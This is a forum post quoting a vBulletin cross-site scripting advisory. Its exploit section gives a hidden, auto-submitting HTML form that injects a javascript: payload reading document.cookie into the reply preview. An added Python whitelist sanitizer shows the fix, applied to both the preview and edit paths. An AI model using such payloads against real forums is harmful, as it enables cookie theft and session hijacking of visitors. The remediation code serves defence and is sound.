
03.12.2004, 15:27
Newbie
Registered: 02.12.2004
Posts: 8
Time on forum: 0
Reputation: 0
Yeah.. this one worked for me twice... then it stopped..
Proof of concept:
While a user is previewing the post, both newreply.php and newthread.php
do sanitize the input in 'Preview', but not in the Edit panel; malicious code can be
injected through this flaw.
Exploit:
A page like the one below can lead a visitor to a Preview page which contains XSS code.
-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)"&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>
-----------------------------End-----------------------------
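As an added defender-side illustration (not vBulletin's code and not part of the quoted advisory), the following whitelist sanitizer is applied to WYSIWYG_HTML on both the preview and the edit-panel paths, so the javascript: URI from the PoC is rejected wherever the field is rendered. All names (`sanitize_html`, `render_post`, the whitelist) are assumptions for this example.

```python
import html
import re
from html.parser import HTMLParser

# Hypothetical whitelist, not vBulletin's: tags/attributes a post may keep.
ALLOWED_TAGS = {"b", "i", "u", "img"}
ALLOWED_ATTRS = {"img": {"src"}}
# Only http(s) or protocol-relative URLs survive; "javascript:" is dropped.
SAFE_URL = re.compile(r"^(https?:)?//", re.IGNORECASE)


class _Sanitizer(HTMLParser):
    """Rebuilds the fragment from scratch, keeping only whitelisted parts."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (script, iframe, ...) is dropped entirely
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value \
                    and SAFE_URL.match(value.strip()):
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "img":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so decoded entities cannot form new tags.
        self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    parser = _Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_post(fields, action):
    """One sanitizer for both paths ('preview' and 'edit'); the flaw in the
    PoC was that only one of them filtered WYSIWYG_HTML."""
    body = sanitize_html(fields.get("WYSIWYG_HTML", ""))
    return f'<div class="post-{action}">{body}</div>'
```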